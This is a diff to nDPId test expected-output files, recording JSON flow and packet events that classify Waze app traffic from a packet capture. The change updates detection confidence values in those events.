+01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871656,"flow_last_seen":1435587871656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871656,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1435587871656,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871656,"pkt":"ABoRAAACABoRAAABCABFAAA8\/jRAAEAGF+wKCAABNubjrLHiAFBcJZMGAAAAAKAC\/\/8UywAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1435587871657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871657,"pkt":"ABoRAAACABoRAAABCABFAAAodJ1AABAG0Zc25uOsCggAAQBQseKj2mz5XCWTB1AS\/\/\/ZAwAA"} 
@@ -53,10 +53,10 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1435587871658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871658,"pkt":"ABoRAAACABoRAAABCABFAAA8NxhAAEAG3wgKCAABNubjrLHkAFDBi1oqAAAAAKAC\/\/\/oPgAAAgQFtAQCCAoACG0yAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1435587871659,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871659,"pkt":"ABoRAAACABoRAAABCABFAAAodJ5AABAG0ZY25uOsCggAAQBQseQ+dKXVwYtaK1AS\/\/\/ZAQAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1435587871660,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871660,"pkt":"ABoRAAACABoRAAABCABFAAAoNxlAAEAG3xsKCAABNubjrLHkAFDBi1orPnSl1lAQ\/\/\/ZAgAA"} -00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871656,"flow_last_seen":1435587871689,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871689,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00803{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":108,"source":"waze.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871656,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_tts\/lang.portuguese_br_tts?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":112,"source":"waze.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871658,"flow_last_seen":1435587871690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1435587871690,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/shields_conf_new_latam?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587871918,"flow_last_seen":1435587871918,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587871918,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1435587871918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587871918,"pkt":"ABoRAAACABoRAAABCABFAAA8cIlAAEAGqJ4KCAABsCJnacdpAbv69x3BAAAAAKAC\/\/\/XPAAAAgQFtAQCCAoACG1IAAAAAAEDAwg="} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1435587871929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871929,"pkt":"ABoRAAACABoRAAABCABFAAAodKhAABAG1JOwImdpCggAAQG7x2kFCOI++vcdwlAS\/\/\/FGAAA"} 
@@ -77,58 +77,58 @@ 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAo\/W1AAEAGG84KCAABsCJnacdrAbsTBZAl7Ppv3FAQ\/\/\/FFwAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoxDVAAEAGxaUKCAABNBFy25hiAbudWal9YqZWhFAQ\/\/9kwAAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1435587871945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587871945,"pkt":"ABoRAAACABoRAAABCABFAAAoRGhAAEAG0cwKCAABNubjrLHqAFALhykw9HjW0VAQ\/\/\/Y\/AAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
-00808{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587871941,"flow_last_seen":1435587872341,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1435587872341,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871918,"flow_last_seen":1435587872045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872045,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871929,"flow_last_seen":1435587872139,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872139,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871935,"flow_last_seen":1435587872205,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872205,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"waze.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871939,"flow_last_seen":1435587872289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587872289,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39010,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00800{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"waze.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587871941,"flow_last_seen":1435587872340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1435587872340,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45546,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/newVconfig\/1.0\/3\/prompts_conf.buf?rtserver-id=15","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
